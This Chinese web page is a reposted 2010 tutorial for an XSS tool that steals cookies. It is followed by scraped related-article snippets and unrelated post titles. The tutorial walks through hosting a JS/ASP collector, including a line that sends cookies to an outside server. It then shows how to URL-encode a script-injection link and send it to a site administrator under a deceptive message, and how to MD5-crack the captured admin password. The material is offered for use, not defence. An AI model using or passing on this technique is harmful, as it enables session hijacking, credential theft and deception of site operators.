牛B装备 XSS 漏洞利用工具[使用教程]

牛B装备 XSS 漏洞利用工具[使用教程]

作者:佚名  来源:本站整理  发布时间:2010-05-02 23:42:50 没人爱的猪 DJlyr
工具下载地址:http://www.7747.net/Soft/200912/16400.html
图片:

在工具中,最让人头疼的就是盗取cookie这个版面.绝对有许多人不知道怎么用.
现在就说一下流程吧.
把生成出来的JS和ASP文件放入空间的根目录中,如果你放的不是根目录,那么就需要修改JS文件.把

img.src = "http://www.7747.net/g.asp?key="+str; (把红色部分修改掉,在后面添加上自己的路径.)
然后找到JS的地址,如[http://www.7747.net/g.js]
<a href=跨站漏洞地址<script src=http://127.0.0.1/g.js>管理员您好,您的网站有漏洞</a>
在此是我们就把 <script src=http://127.0.0.1/g.js> 进行URL加密.
<a href=跨站漏洞地址%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%67%2E%6A%73%3E>管理员您好,您的网站有漏洞</a>
最后把这个盗取连接发送给管理员,只要他点击.那么COOKIE就会自己保存到ASP文件夹中设置的.COOKIE.TXT(程序默认)的文本文件中.
打开保存有管理员 帐号 密码 的COOKIE 密码在进行MD5解密就可以了.
 原文地址:http://www.zzfhw.com/wenzhang/html/fangheishow-18559.html

分类: 9_1_XSS

转载于:https://www.cnblogs.com/fdsajhg30000/archive/2011/02/14/1954200.html

牛B装备 XSS 漏洞利用工具[使用教程]相关推荐

  1. xss漏洞利用方式总结

    目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...

  2. 7. Vulnerability exploitation tools (漏洞利用工具 11个)

    Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

  3. ASP.net 资源请求漏洞利用工具PadBuster

    ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

  4. S2-045漏洞利用工具解决方案

    S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

  5. WPS漏洞利用工具Bully常见命令集合

    WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.

  6. WebDAV服务漏洞利用工具DAVTest

    WebDAV服务漏洞利用工具DAVTest WebDAV是基于Web服务的扩展服务.它允许用户像操作本地文件一样,操作服务器上的文件.借助该功能,用户很方便的在网络上存储自己的文件.为了方便用户使用, ...

  7. Sundown EK:漏洞利用工具中的抄袭大师

    简介 Sundown是目前市场上最新款的漏洞利用工具,而Sundown的作者也成功地证明了自己其实就是一个抄袭大师.不知道这种"借鸡生蛋"的事情被曝光之后,还有用户会买他的单吗? ...

  8. 不能执行已释放 script 的代码_[漏洞预警]CVE20190708远程桌面代码执行漏洞利用工具已放出...

    漏洞描述 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了许多版本的Windows操作系统.该漏洞在不需身份认证的情况下即可远程触发,危害与影 ...

  9. expsky.php,Typecho漏洞利用工具首发,半分钟完成渗透

    原标题:Typecho漏洞利用工具首发,半分钟完成渗透 *本文原创作者:expsky,本文属FreeBuf原创奖励计划,未经许可禁止转载 声明:本工具由expsky原创,仅用于技术研究,不恰当使用会对 ...

  10. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

最新文章

  1. Spring Boot 3.0 M1 发布,正式弃用 Java 8,最低要求 Java 17。。。
  2. 多线程Java服务器简单实现
  3. java运行机制是什么_JAVA运行机制
  4. NSDate根据日期获得当前是周几,以及一年内的第几周,以及一个月内得第几周...
  5. 亿些模板【数论数学】
  6. html中表格内容居右的写法
  7. AMD第三季:站在金融危机对面
  8. windows安装yarn和tyarn
  9. 西安交大计算机录取分数线,2017年西安交通大学各省录取分数线
  10. java datasource 详解_Spring的datasource配置详解
  11. 这是互联网变得越来越敌对的7种方式
  12. springmvc+vue ssm 医院预约挂号系统#毕业设计
  13. 最新好看的自适应手机版软件APP下载类网站源码,游戏软件应用网站源码,自适应手机端Pbootcms模板
  14. 计算机竖版桌面,电脑桌面竖屏了怎么办
  15. 酒桌上应对(from:http://www.haozai.com/bbs/dispbbs.asp?boardID=6ID=106page=1)
  16. 形容词,名词记忆(三):ment, ent后缀常用词
  17. OPencv无损保存图片
  18. idc服务器维护岗位,IDC运维工程师工作内容
  19. 008-break语句与continue语句的使用,循环嵌套
  20. foxmail7.2导入地址簿

热门文章

  1. TechSmith Camtasia Mac v2021屏幕录制剪辑软件
  2. 处理 Exception 的几种实践,很优雅,已被很多团队采纳!
  3. 史上最便捷搭建 Zookeeper 的方法!
  4. 京东笔试题:如何实现 MySQL 删除重复记录并且只保留一条?
  5. Spring Boot 如何使用 Redis 进行 API 防刷限流?
  6. 关于东南亚互联网市场的现状,有些问题得搞清楚
  7. “干活的干不过写PPT 的”:新东方年会神曲刷屏背后:这3点值得我们思考
  8. 我的朋友圈又被刷屏了。
  9. JAVA面试之互联网、经验篇
  10. 为什么说传统分布式事务不再适用于微服务架构?